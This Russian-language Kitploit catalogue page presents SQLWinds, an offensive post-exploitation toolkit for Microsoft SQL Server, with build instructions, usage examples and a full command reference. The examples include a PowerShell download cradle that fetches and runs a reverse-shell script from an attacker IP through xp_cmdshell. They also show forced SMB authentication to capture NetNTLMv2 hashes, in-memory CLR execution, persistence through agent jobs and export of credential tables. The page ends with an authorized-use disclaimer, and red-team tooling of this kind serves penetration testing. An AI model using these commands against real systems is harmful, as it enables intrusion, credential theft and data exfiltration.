Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
sqlwinds — SQLWinds - Оценка безопасности SQL Server и набор инструментов для пост-эксплуатации | Kitploit
Инструменты/GitHubGitHub/blue0x1/sqlwinds
Повышение привилегийМеханизмы персистентностиЭксплуатацияЛатеральное перемещениеАудит конфигурацииЭксфильтрация данныхПост-эксплуатацияТестирование на ПроникновениеRed TeamingБезопасность Баз Данных
GitHubblue0x1/sqlwinds
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

sqlwinds

SQLWinds - Оценка безопасности SQL Server и набор инструментов для пост-эксплуатации

Репозиторий

SQLWinds

Инструментарий для оценки безопасности SQL и пост-эксплуатации

SQLWinds — это инструмент командной строки для тестирования безопасности и эксплуатации Microsoft SQL Server. Он предоставляет интерактивную среду для глубокого анализа серверов, повышения привилегий, выполнения атак и перемещения по сети с помощью специализированных команд для таких задач, как выполнение кода в памяти и исследование базы данных SCCM.


SQLWinds


📖 Документация и ресурсы

Wiki Issues Releases

Быстрые ссылки:

  • Полная документация и Wiki — полное руководство по использованию и справочник команд
  • Сообщить об ошибке — Нашли баг или есть предложение по функционалу?
  • Последний релиз — Скачать новейшую версию

Возможности

  • Различные способы аутентификации: Поддержка SQL, встроенной аутентификации Windows (--integrated) и делегирования Kerberos (--kerberos с --user/--pass).
  • Всесторонняя разведка:
    • Информация о сервере, базы данных, таблицы, столбцы, пользователи и разрешения.
    • Аудит конфигурации безопасности (xp_cmdshell, CLR, OLE и др.).
    • Обнаружение чувствительных данных и извлечение секретов.
    • Перечисление и эксплуатация связанных серверов.
  • Пост-эксплуатация и горизонтальное перемещение:
    • Выполнение кода: Включение и использование xp_cmdshell, процедур автоматизации OLE (sp_oacreate) и интеграции CLR.
    • CLR в памяти: Загрузка и выполнение .NET-сборок напрямую из памяти без сохранения файлов на диск (:memclr).
    • Кража учётных данных: Принудительная SMB-аутентификация на UNC-путь для атак с ретрансляцией (:unc_smb).
    • Взаимодействие с реестром: Чтение разделов и значений реестра через xp_regread.
    • Постоянство: Создание, просмотр и выполнение заданий агента SQL.

Установка и компиляция

Быстрая сборка

В репозитории есть скрипт build.bat для простой компиляции в Windows:

root@kitploit:~
.\build.bat

Скомпилированный исполняемый файл SQLWinds.exe будет помещён в каталог bin\Release\.

Ручная сборка

  1. Убедитесь, что установлен .NET Framework (≥ 4.6.1) или .NET SDK.
  2. Клонируйте репозиторий:
    root@kitploit:~
    git clone https://github.com/blue0x1/sqlwinds.git
    cd sqlwinds
    
  3. Скомпилируйте решение:
    root@kitploit:~
    msbuild SQLWinds.sln /p:Configuration=Release
    

Использование

Базовое подключение

root@kitploit:~
# SQL-аутентификация
SQLWinds.exe --server TARGET\\INSTANCE --user sa --pass Password123

# Аутентификация Windows (текущий контекст пользователя)
SQLWinds.exe --server sql01.corp.local --integrated

# Делегирование Kerberos (с указанными учётными данными)
SQLWinds.exe --server sql01.prod.corp.local --kerberos --user CORP\\svc_sql --pass SvcPass123!

# Подключение и выполнение одной команды
SQLWinds.exe --server 10.0.0.5 --user sa --pass pass --run-cmd "SELECT name FROM sys.databases"

Часто используемые параметры командной строки

Интерактивный режим REPL

root@kitploit:~
sqlwinds> :info
sqlwinds> :dbs
sqlwinds> :users
sqlwinds> :enable_xp_cmdshell
sqlwinds> :xp whoami
sqlwinds> :spn
sqlwinds> help

Полный справочник команд REPL

Пример: использование :plain для больших скриптов

Команда :plain необходима для выполнения больших многострочных SQL-скриптов.

root@kitploit:~
sqlwinds> :plain
SQL> 
SQL> BEGIN TRY
.....>     SELECT * FROM [VeryImportantTable];
.....>     EXEC sp_configure 'show advanced options', 1;
.....>     RECONFIGURE;
.....> END TRY
.....> BEGIN CATCH
.....>     SELECT ERROR_MESSAGE();
.....> END CATCH
.....> :execute
  1. Введите :plain и нажмите Enter.
  2. Вставьте или введите полный SQL-скрипт.
  3. На новой строке введите :execute для выполнения всего скрипта или :cancel для отмены.

Примеры

1. Аудит

root@kitploit:~
SQLWinds.exe --server dc01 --integrated --security-audit 

2. Использование xp_cmdshell для выполнения кода

root@kitploit:~
SQLWinds.exe --server 192.168.1.15 --user sa --pass pass --enable-xp-cmdshell
# В открывшемся REPL:
sqlwinds> :xp whoami /all
sqlwinds> :xp powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.10/revshell.ps1')"

3. Выполнение CLR в памяти (без записи на диск)

root@kitploit:~
# Скомпилируйте вашу .NET-сборку в DLL (например, CommandExecutor.dll)
sqlwinds> :enable_clr
sqlwinds> :memclr "C:\Tools\CommandExecutor.dll" "CommandExecutor.Class1" "Exec" "whoami"

4. Перехват хэшей NetNTLMv2 через SRelay

root@kitploit:~
# На вашей машине: sudo responder -I tun0
sqlwinds> :unc_smb \\10.10.15.10\fake_share

5. Эксплуатация базы данных SCCM

root@kitploit:~
SQLWinds.exe --server sccmdb.corp.local --integrated
sqlwinds> :sccm_info
sqlwinds> :sccm_collections
sqlwinds> :sccm_application "Microsoft 365"

6. Эксфильтрация данных

root@kitploit:~
# Экспорт чувствительных данных в CSV
sqlwinds> :exportcsv "SELECT username, password FROM users" credentials.csv

# Скачивание файла, хранящегося в базе данных
sqlwinds> :download "SELECT file_data FROM documents WHERE id=1" secret.docx

🤝 Вклад и поддержка

Мы приветствуем ваш вклад! Если у вас есть идеи по улучшению или вы нашли какие-либо проблемы:

  1. Ознакомьтесь с Wiki для изучения документации
  2. Поищите в существующих Issues, чтобы избежать дубликатов
  3. Создайте новый issue с подробной информацией о вашем предложении или отчёте об ошибке

⚠️ Предупреждение

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным. Разработчики не несут ответственности и не отвечают за любое неправомерное использование или ущерб, причинённый этой программой.


Авторы

Разработано blue0x1.

Скачать инструмент
  • Эксфильтрация данных: Загрузка/выгрузка файлов и экспорт результатов запросов в CSV/JSON.
  • Взаимодействие с базой данных SCCM: (Если целевая база данных — SCCM)
    • Обнаружение SCCM и вывод информации о версии/сайте.
    • Инвентаризация оборудования, ПО, коллекций и развёртываний.
    • Проведение аудита безопасности, специфичного для SCCM.
  • Анализ Kerberos: Проверка Active Directory на наличие SPN, связанных с целевым сервером, для устранения проблем с аутентификацией Kerberos.
  • Обнаружение экземпляров: Перечисление доступных в домене экземпляров SQL Server.
  • Продвинутый REPL: Интерактивная среда с автодополнением и историей команд.
  • ПараметрОписание
    --serverЦелевой сервер (IP, имя хоста, экземпляр). Обязательный.
    --user, --passУчётные данные для SQL- или Windows-аутентификации.
    --integratedИспользовать текущий токен Windows для аутентификации.
    --kerberosИспользовать поток аутентификации Kerberos.
    --spn-checkПроверить SPN в AD для целевого хоста.
    --run-cmd "<SQL>"Выполнить одну SQL-команду и выйти.
    --run-file file.sqlВыполнить SQL-скрипт из файла и выйти.
    --infoСобрать и отобразить подробную информацию о сервере.
    --getinstanceОбнаружить SQL-экземпляры в домене и выйти.
    --list-dbsВывести список баз данных и выйти.
    --security-auditВыполнить аудит безопасности и выйти.
    КомандаОписаниеПример
    :infoПоказать подробную информацию о сервере:info
    :dbsВывести список всех баз данных с деталями:dbs
    :tables [db] [schema]Вывести список таблиц в базе/схеме:tables master dbo
    :columns <table> [schema] [db]Вывести список столбцов таблицы:columns Users dbo MyDatabase
    :usersВывести список всех SQL-логинов и пользователей БД:users
    :permsПоказать разрешения текущего пользователя:perms
    :auditВыполнить аудит конфигурации безопасности:audit
    :search [term]Поиск чувствительных данных:search password
    :secretsИзвлечь потенциальные секреты:secrets
    :servicesПоказать учётные записи служб SQL Server:services
    :spnПроверить SPN для целевого хоста:spn
    :enable_xp_cmdshellВключить xp_cmdshell:enable_xp_cmdshell
    :disable_xp_cmdshellОтключить xp_cmdshell:disable_xp_cmdshell
    :xp <command>Выполнить команду ОС через xp_cmdshell:xp whoami
    :enable_oleВключить автоматизацию OLE:enable_ole
    :disable_oleОтключить автоматизацию OLE:disable_ole
    :ole_cmd <command>Выполнить команду ОС через OLE:ole_cmd "calc.exe"
    :enable_clrВключить интеграцию CLR:enable_clr
    :disable_clrОтключить интеграцию CLR:disable_clr
    :deploy-clr <path>Развернуть сборку CLR из файла:deploy-clr C:\Tools\cmd.dll
    :list-assembliesВывести список развёрнутых сборок CLR:list-assemblies
    :clr_execВыполнить метод CLR:clr_exec MyAssembly MyClass Method arg1
    :memclrВыполнить сборку CLR из памяти:memclr "C:\Tools\exec.dll" "Namespace.Class" "Method" "arg"
    :remove-assembly <name>Удалить сборку CLR:remove-assembly MyAssembly
    :list_linkserversВывести список связанных серверов:list_linkservers
    :linkrpc <srv> <cmd>Выполнить команду через связанный сервер:linkrpc LINKEDSRV "whoami"
    :impersonate <login>Выполнить имперсонализацию SQL-логина:impersonate sa
    :revertВернуть исходный контекст безопасности:revert
    :agent_jobУправление заданиями агента SQL:agent_job create MyJob "whoami"
    :ls [path]Вывести содержимое каталога через SQL:ls C:\Windows\Temp
    :unc_smb <path>Принудительная SMB-аутентификация на UNC:unc_smb \\192.168.1.100\share
    :plainВставка больших SQL-скриптов(см. пример ниже)
    :regreadПрочитать значение реестра:regread HKEY_LOCAL_MACHINE Software\Microsoft value
    :regread_allВывести все значения в разделе:regread_all HKEY_LOCAL_MACHINE Software\Microsoft
    :uploadЗагрузить файл в таблицу:upload C:\file.txt MyTable
    :downloadСкачать двоичные данные из запроса:download "SELECT file FROM blobs" out.bin
    :exportcsvЭкспортировать запрос в CSV:exportcsv "SELECT * FROM users" out.csv
    :exportjsonЭкспортировать запрос в JSON:exportjson "SELECT * FROM users" out.json
    :sccm_infoОбнаружить базу данных SCCM:sccm_info
    :sccm_inventoryПоказать инвентаризацию SCCM:sccm_inventory
    :sccm_collectionsВывести список коллекций SCCM:sccm_collections "All Systems"
    :sccm_deploymentsПоказать развёртывания:sccm_deployments
    :sccm_clientsВывести список клиентов:sccm_clients inactive
    :sccm_auditАудит безопасности SCCM:sccm_audit
    :sccm_applicationПоказать детали приложения:sccm_application "Google Chrome"
    helpПоказать справкуhelp
    exitВыйти из REPLexit